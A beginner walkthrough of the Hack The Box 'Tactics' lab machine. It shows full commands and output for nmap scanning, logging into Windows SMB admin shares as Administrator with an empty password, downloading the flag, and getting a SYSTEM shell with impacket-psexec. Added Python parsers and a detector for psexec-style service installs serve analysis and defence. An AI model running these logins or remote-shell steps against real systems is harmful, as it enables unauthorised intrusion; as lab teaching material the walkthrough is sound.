The aim of this walkthrough is to provide help with the Tactics machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help complete beginners finish the Starting Point TIER 1 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
We can use the unset command to remove it once we no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?
We start out with a quick connection test.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ ping $rhost -c 4
PING 10.129.118.218 (10.129.118.218) 56(84) bytes of data.
64 bytes from 10.129.118.218: icmp_seq=1 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=2 ttl=127 time=10.4 ms
64 bytes from 10.129.118.218: icmp_seq=3 ttl=127 time=10.8 ms
64 bytes from 10.129.118.218: icmp_seq=4 ttl=127 time=10.6 ms
--- 10.129.118.218 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 10.392/10.645/10.836/0.174 ms
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Running nmap without any options does not work, but it does in fact give us a hint.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ nmap $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:18 BST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
So let’s try it.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ nmap -Pn $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:21 BST
Nmap scan report for 10.129.118.218
Host is up (0.013s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Three of the 1,000 ports nmap scans by default appear to be open: 135, 139 and 445.
Let’s check these reported services for some more information.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ nmap -p135,139,445 -Pn -sC -sV $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 22:38 BST
Nmap scan report for 10.129.118.218
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-05-10T21:38:14
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.52 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
-Pn
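As an added example (not part of the original walkthrough), here is a small Python parser for the nmap output above: it pulls out the open ports and the smb2-security-mode verdict, so the "Message signing enabled but not required" line is not lost among the rest of the scan. The sample text is the scan output from this page; the function and field names are my own.

```python
import re

# Sample output, constructed from the nmap -sC -sV run shown in this walkthrough.
NMAP_OUTPUT = """\
Nmap scan report for 10.129.118.218
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|   date: 2023-05-10T21:38:14
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
REPORT_LINE = re.compile(r"^Nmap scan report for (\S+)")


def parse_nmap(text):
    """Extract the host, its open ports and the SMB signing verdict from normal nmap output."""
    result = {"host": None, "open_ports": [], "smb_signing_required": None}
    script = None  # name of the NSE script whose "|" block we are currently inside
    for line in text.splitlines():
        m = REPORT_LINE.match(line)
        if m:
            result["host"] = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            result["open_ports"].append(
                {"port": int(m.group(1)), "proto": m.group(2),
                 "service": m.group(4), "version": (m.group(5) or "").strip()})
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()
            # "smb2-security-mode:" opens a script block; "311:" is an SMB dialect, not a script
            if body.endswith(":") and not body[:-1].isdigit():
                script = body[:-1]
            elif script == "smb2-security-mode" and "Message signing" in body:
                # True only for "enabled and required"; "but not required" / "disabled" give False
                result["smb_signing_required"] = "required" in body and "not required" not in body
    return result
```

A host that answers "enabled but not required" is worth recording as a hardening finding alongside the open ports.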
TASK 2
Question: What does the 3-letter acronym SMB stand for?
A quick online search can do wonders…
server message block
TASK 3
Question: What port does SMB use to operate at?
Online research, just like in the previous task.
445
TASK 4
Question: What command line argument do you give to `smbclient` to list available shares?
Using the command’s built-in help option should give us a hand here.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
...
-L, --list=HOST Get a list of shares available on a host
...
Trying the default Administrator account with an empty password, in the hope that it is misconfigured, does not disappoint.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient -L $rhost -U Administrator
Password for [WORKGROUP\Administrator]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Three shares are listed on our target machine.
-L
TASK 5
Question: What character at the end of a share name indicates it's an administrative share?
Looking at the shares reported in TASK 4, it must be $. But let’s try to access the shares:
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient //$rhost/ADMIN$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 20 17:02:48 2021
.. D 0 Mon Sep 20 17:02:48 2021
$Reconfig$ D 0 Mon Sep 20 17:02:49 2021
ADFS D 0 Sat Sep 15 08:19:03 2018
appcompat D 0 Sat Sep 15 08:19:00 2018
apppatch D 0 Mon Oct 29 22:39:47 2018
AppReadiness D 0 Wed Apr 21 16:39:36 2021
assembly DR 0 Sat Sep 15 10:09:13 2018
bcastdvr D 0 Sat Sep 15 08:19:00 2018
bfsvc.exe A 78848 Sat Sep 15 08:12:58 2018
Boot D 0 Sat Sep 15 08:19:01 2018
bootstat.dat AS 67584 Wed May 10 22:15:58 2023
Branding D 0 Sat Sep 15 08:19:01 2018
CbsTemp D 0 Wed Jul 7 19:00:03 2021
Containers D 0 Sat Sep 15 08:19:01 2018
Cursors D 0 Sat Sep 15 08:19:04 2018
debug D 0 Wed Apr 21 16:17:15 2021
diagnostics D 0 Sat Sep 15 08:19:01 2018
DigitalLocker D 0 Sat Sep 15 10:05:40 2018
Downloaded Program Files DS 0 Sat Sep 15 08:19:04 2018
drivers D 0 Sat Sep 15 08:19:01 2018
DtcInstall.log A 1947 Wed Apr 21 16:16:44 2021
ELAMBKUP DH 0 Sat Sep 15 08:19:04 2018
en-US D 0 Sat Sep 15 10:05:40 2018
explorer.exe A 4245280 Mon Oct 29 22:39:24 2018
Fonts DSR 0 Sat Sep 15 08:19:04 2018
Globalization D 0 Sat Sep 15 08:19:01 2018
Help D 0 Sat Sep 15 10:05:40 2018
HelpPane.exe A 1065472 Sat Sep 15 08:12:46 2018
hh.exe A 18432 Sat Sep 15 08:12:48 2018
IdentityCRL D 0 Sat Sep 15 08:19:04 2018
IME D 0 Sat Sep 15 10:05:40 2018
ImmersiveControlPanel DR 0 Wed Apr 21 16:16:42 2021
INF D 0 Wed May 10 22:09:44 2023
InputMethod D 0 Sat Sep 15 08:19:01 2018
Installer DHS 0 Wed Jul 7 19:05:00 2021
L2Schemas D 0 Sat Sep 15 08:19:04 2018
LiveKernelReports D 0 Sat Sep 15 08:19:01 2018
Logs D 0 Tue Sep 21 17:33:25 2021
lsasetup.log A 1380 Wed Apr 21 16:16:02 2021
media DSR 0 Sat Sep 15 08:19:04 2018
mib.bin A 43131 Sat Sep 15 08:12:40 2018
Microsoft.NET DR 0 Wed May 10 22:15:59 2023
Migration D 0 Sat Sep 15 08:19:01 2018
ModemLogs D 0 Sat Sep 15 08:19:01 2018
notepad.exe A 254464 Sat Sep 15 08:12:38 2018
OCR D 0 Sat Sep 15 10:07:04 2018
Offline Web Pages DR 0 Sat Sep 15 08:19:05 2018
Panther D 0 Wed Apr 21 16:16:50 2021
Performance D 0 Sat Sep 15 08:19:01 2018
PFRO.log A 1708 Mon Sep 27 11:26:45 2021
PLA D 0 Sat Sep 15 08:19:01 2018
PolicyDefinitions D 0 Sat Sep 15 10:08:05 2018
Prefetch Dn 0 Wed Apr 21 16:16:20 2021
PrintDialog DR 0 Wed Apr 21 16:16:43 2021
Provisioning D 0 Sat Sep 15 08:19:01 2018
regedit.exe A 358400 Sat Sep 15 08:12:52 2018
Registration D 0 Wed May 10 22:05:37 2023
RemotePackages D 0 Sat Sep 15 08:19:01 2018
rescache D 0 Sat Sep 15 08:19:01 2018
Resources D 0 Sat Sep 15 08:19:01 2018
SchCache D 0 Sat Sep 15 08:19:01 2018
schemas D 0 Sat Sep 15 08:19:01 2018
security D 0 Sat Sep 15 08:19:01 2018
ServerStandard.xml A 30931 Sat Sep 15 08:13:27 2018
ServiceProfiles D 0 Wed Apr 21 16:16:04 2021
ServiceState D 0 Sat Sep 15 08:19:01 2018
servicing D 0 Sat Sep 15 10:06:36 2018
Setup D 0 Sat Sep 15 08:21:38 2018
ShellComponents D 0 Sat Sep 15 08:19:05 2018
ShellExperiences D 0 Sat Sep 15 08:19:05 2018
SKB D 0 Sat Sep 15 08:19:01 2018
SoftwareDistribution D 0 Wed Apr 21 16:23:54 2021
Speech D 0 Sat Sep 15 08:19:01 2018
Speech_OneCore D 0 Sat Sep 15 08:19:01 2018
splwow64.exe A 132096 Sat Sep 15 08:13:30 2018
System D 0 Sat Sep 15 08:19:01 2018
system.ini A 219 Sat Sep 15 08:16:48 2018
System32 D 0 Wed May 10 22:09:44 2023
SystemApps D 0 Sat Sep 15 08:19:01 2018
SystemResources D 0 Sat Sep 15 08:19:01 2018
SysWOW64 D 0 Wed Jul 7 19:04:43 2021
TAPI D 0 Tue Sep 21 17:51:49 2021
Tasks D 0 Wed Apr 21 16:16:18 2021
Temp D 0 Wed May 10 22:16:17 2023
TextInput D 0 Sat Sep 15 08:19:14 2018
tracing D 0 Sat Sep 15 08:19:01 2018
twain_32 D 0 Sat Sep 15 08:19:14 2018
twain_32.dll A 64512 Sat Sep 15 08:13:11 2018
Vss D 0 Sat Sep 15 08:19:01 2018
WaaS D 0 Sat Sep 15 08:19:01 2018
Web D 0 Sat Sep 15 08:19:01 2018
win.ini A 92 Sat Sep 15 08:16:48 2018
WindowsShell.Manifest AHR 670 Sat Sep 15 08:12:40 2018
WindowsUpdate.log A 276 Wed May 10 22:05:41 2023
winhlp32.exe A 11776 Sat Sep 15 08:13:11 2018
WinSxS D 0 Wed Jul 7 18:46:29 2021
WMSysPr9.prx A 316640 Sat Sep 15 08:12:02 2018
write.exe A 11264 Sat Sep 15 08:12:55 2018
3774463 blocks of size 4096. 1156502 blocks available
smb: \> pwd
Current directory is \\10.129.118.218\ADMIN$\
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
It looks like the ADMIN$ share contains the Windows system files. How about the other two?
We get lucky once we look around the C$ share: the final flag is located at \\$rhost\C$\Users\Administrator\Desktop\flag.txt, so we download it to our local machine.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ smbclient //$rhost/C$ -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Wed Apr 21 16:23:49 2021
Config.Msi DHS 0 Wed Jul 7 19:04:56 2021
Documents and Settings DHSrn 0 Wed Apr 21 16:17:12 2021
pagefile.sys AHS 738197504 Wed May 10 22:05:32 2023
PerfLogs D 0 Sat Sep 15 08:19:00 2018
Program Files DR 0 Wed Jul 7 19:04:24 2021
Program Files (x86) D 0 Wed Jul 7 19:03:38 2021
ProgramData DH 0 Tue Sep 13 17:27:53 2022
Recovery DHSn 0 Wed Apr 21 16:17:15 2021
System Volume Information DHS 0 Wed Apr 21 16:34:04 2021
Users DR 0 Wed Apr 21 16:23:18 2021
Windows D 0 Wed Jul 7 19:05:23 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \> cd Users
smb: \Users\> ls
. DR 0 Wed Apr 21 16:23:18 2021
.. DR 0 Wed Apr 21 16:23:18 2021
Administrator D 0 Wed Apr 21 16:23:32 2021
All Users DHSrn 0 Sat Sep 15 08:28:48 2018
Default DHR 0 Wed Apr 21 16:17:12 2021
Default User DHSrn 0 Sat Sep 15 08:28:48 2018
desktop.ini AHS 174 Sat Sep 15 08:16:48 2018
Public DR 0 Wed Apr 21 16:23:31 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\> cd Administrator
smb: \Users\Administrator\> ls
. D 0 Wed Apr 21 16:23:32 2021
.. D 0 Wed Apr 21 16:23:32 2021
3D Objects DR 0 Wed Apr 21 16:23:31 2021
AppData DH 0 Wed Apr 21 16:23:19 2021
Application Data DHSrn 0 Wed Apr 21 16:23:19 2021
Contacts DR 0 Wed Apr 21 16:23:31 2021
Cookies DHSrn 0 Wed Apr 21 16:23:19 2021
Desktop DR 0 Thu Apr 22 08:16:03 2021
Documents DR 0 Wed Apr 21 16:23:32 2021
Downloads DR 0 Wed Jul 7 18:44:36 2021
Favorites DR 0 Wed Apr 21 16:23:31 2021
Links DR 0 Wed Apr 21 16:23:32 2021
Local Settings DHSrn 0 Wed Apr 21 16:23:19 2021
Music DR 0 Wed Apr 21 16:23:32 2021
My Documents DHSrn 0 Wed Apr 21 16:23:19 2021
NetHood DHSrn 0 Wed Apr 21 16:23:19 2021
NTUSER.DAT AHn 786432 Tue Sep 13 17:29:05 2022
ntuser.dat.LOG1 AHS 65536 Wed Apr 21 16:23:18 2021
ntuser.dat.LOG2 AHS 238592 Wed Apr 21 16:23:18 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Wed Apr 21 10:03:39 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Apr 21 16:23:19 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Apr 21 16:23:19 2021
ntuser.ini HS 20 Wed Apr 21 16:23:19 2021
Pictures DR 0 Wed Apr 21 16:23:31 2021
PrintHood DHSrn 0 Wed Apr 21 16:23:19 2021
Recent DHSrn 0 Wed Apr 21 16:23:19 2021
Saved Games DR 0 Wed Apr 21 16:23:32 2021
Searches DR 0 Wed Apr 21 16:23:32 2021
SendTo DHSrn 0 Wed Apr 21 16:23:19 2021
Start Menu DHSrn 0 Wed Apr 21 16:23:19 2021
Templates DHSrn 0 Wed Apr 21 16:23:19 2021
Videos DR 0 Wed Apr 21 16:23:31 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Thu Apr 22 08:16:03 2021
.. DR 0 Thu Apr 22 08:16:03 2021
desktop.ini AHS 282 Wed Apr 21 16:23:32 2021
flag.txt A 32 Fri Apr 23 10:39:00 2021
3774463 blocks of size 4096. 1156502 blocks available
smb: \Users\Administrator\Desktop\> pwd
Current directory is \\10.129.118.218\C$\Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> exit
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
$
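Added example, not code from the walkthrough: a Python parser for the smbclient ls listings above (the C$ root listing is embedded as sample input), which turns each line into a record with attribute flags, size and timestamp and can pick out files such as flag.txt. Names containing spaces are handled; a file with no attribute letters whose name ends in a letters-only word is an edge case this simple regex does not cover.

```python
import re
from datetime import datetime

# Constructed sample: the root listing of the C$ share as printed by smbclient's "ls" above.
C_ROOT_LISTING = """\
  $Recycle.Bin                      DHS        0  Wed Apr 21 16:23:49 2021
  Config.Msi                        DHS        0  Wed Jul  7 19:04:56 2021
  Documents and Settings          DHSrn        0  Wed Apr 21 16:17:12 2021
  pagefile.sys                      AHS 738197504  Wed May 10 22:05:32 2023
  PerfLogs                            D        0  Sat Sep 15 08:19:00 2018
  Program Files                      DR        0  Wed Jul  7 19:04:24 2021
  Program Files (x86)                 D        0  Wed Jul  7 19:03:38 2021
  ProgramData                        DH        0  Tue Sep 13 17:27:53 2022
  Recovery                         DHSn        0  Wed Apr 21 16:17:15 2021
  System Volume Information         DHS        0  Wed Apr 21 16:34:04 2021
  Users                              DR        0  Wed Apr 21 16:23:18 2021
  Windows                             D        0  Wed Jul  7 19:05:23 2021

                3774463 blocks of size 4096. 1156502 blocks available
"""

# name (may contain spaces), attribute letters, size in bytes, ctime-style timestamp
ENTRY = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[A-Za-z]*)\s+(?P<size>\d+)\s+"
    r"(?P<date>[A-Z][a-z]{2} [A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d \d{4})\s*$")


def parse_listing(text):
    """Turn smbclient 'ls' output into records; skips '.', '..' and the trailing blocks summary."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m or m.group("name") in (".", ".."):
            continue
        attrs = set(m.group("attrs"))  # D=directory, A=archive, H=hidden, S=system, R=read-only
        when = datetime.strptime(" ".join(m.group("date").split()), "%a %b %d %H:%M:%S %Y")
        entries.append({"name": m.group("name"), "attrs": attrs, "is_dir": "D" in attrs,
                        "hidden": "H" in attrs, "size": int(m.group("size")), "mtime": when})
    return entries


def find_files(text, pattern):
    """Non-directory entries whose name matches the regex, e.g. r'^flag\.txt$' for the flag file."""
    return [e for e in parse_listing(text) if not e["is_dir"] and re.search(pattern, e["name"], re.I)]
```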
TASK 6
Question: Which Administrative share is accessible on the box that allows users to view the whole file system?
The answer should be quite simple, since we used the exact same share in TASK 5 to download our flag file.
C$
TASK 7
Question: What command can we use to download the files we find on the SMB Share?
Again, we used the same command to download the flag file in TASK 5.
get
TASK 8
Question: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?
Optionally, we could use Impacket's psexec.py tool to spawn a shell on the target through the writable ADMIN$ share. Once we have located the flag, reading it becomes quite simple.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Requesting shares on 10.129.118.218.....
[*] Found writable share ADMIN$
[*] Uploading file qbvrkWIQ.exe
[*] Opening SVCManager on 10.129.118.218.....
[*] Creating service UNVK on 10.129.118.218.....
[*] Starting service UNVK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd ..
C:\Windows>cd \Users\
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is EEE0-FCDB
Directory of C:\Users\Administrator\Desktop
04/22/2021 12:16 AM <DIR> .
04/22/2021 12:16 AM <DIR> ..
04/23/2021 02:39 AM 32 flag.txt
1 File(s) 32 bytes
2 Dir(s) 4,736,704,512 bytes free
C:\Users\Administrator\Desktop>type flag.txt
<flag>
C:\Users\Administrator\Desktop>
psexec.py
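From the defender's side, as an added example rather than part of the walkthrough: the psexec.py session above uploads a randomly named executable into ADMIN$ (which maps to the Windows directory) and registers it as a randomly named service, and the Service Control Manager records each such install as Event ID 7045 in the System log. The Python below scores such records over a constructed sample; the event field names follow 7045's data fields, and the naming heuristics are assumptions taken from the names seen in this session (other tooling may pick different patterns).

```python
import re

# Constructed sample of Windows System-log "service installed" events (Event ID 7045), modelled
# on the psexec.py session above: an 8-letter random executable uploaded into ADMIN$ (C:\Windows)
# and registered as a 4-letter service running as LocalSystem. Other records are benign fillers.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "UNVK", "ImagePath": r"%SystemRoot%\qbvrkWIQ.exe",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "BackupAgent", "ImagePath": r"C:\Program Files\Backup\agent.exe",
     "AccountName": "LocalSystem", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe",
     "AccountName": "LocalSystem", "StartType": "auto start"},
    {"EventID": 7036, "ServiceName": "UNVK", "ImagePath": "", "AccountName": "", "StartType": ""},
]

# Executable dropped straight into the Windows directory (what ADMIN$ maps to) with a random name
RANDOM_EXE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)
RANDOM_SVC = re.compile(r"^[A-Za-z]{4}$")  # 4-letter service name, as in the session above


def service_install_indicators(event):
    """Return the reasons a 7045 record looks like a psexec-style remote service install."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    if RANDOM_EXE.match(event.get("ImagePath", "").strip('"')):
        reasons.append("random-looking binary dropped in %SystemRoot% (ADMIN$)")
    if RANDOM_SVC.match(event.get("ServiceName", "")):
        reasons.append("random-looking 4-letter service name")
    if reasons and event.get("AccountName") == "LocalSystem":
        reasons.append("service runs as LocalSystem")  # explains the 'nt authority\system' shell
    return reasons


def suspicious_service_installs(events):
    """Map suspicious service names to their indicators; benign installs are dropped."""
    hits = {}
    for e in events:
        reasons = service_install_indicators(e)
        if reasons:
            hits[e["ServiceName"]] = reasons
    return hits
```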
SUBMIT FLAG
Question: Submit root flag
Simply grabbing the downloaded flag file from TASK5 should do it.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$ cat flag.txt
<flag>
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-luovj0ahiq]─[~]
└──╼ [★]$
Optionally, we could use Impacket's psexec.py tool as we did in TASK 8.
flag
Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!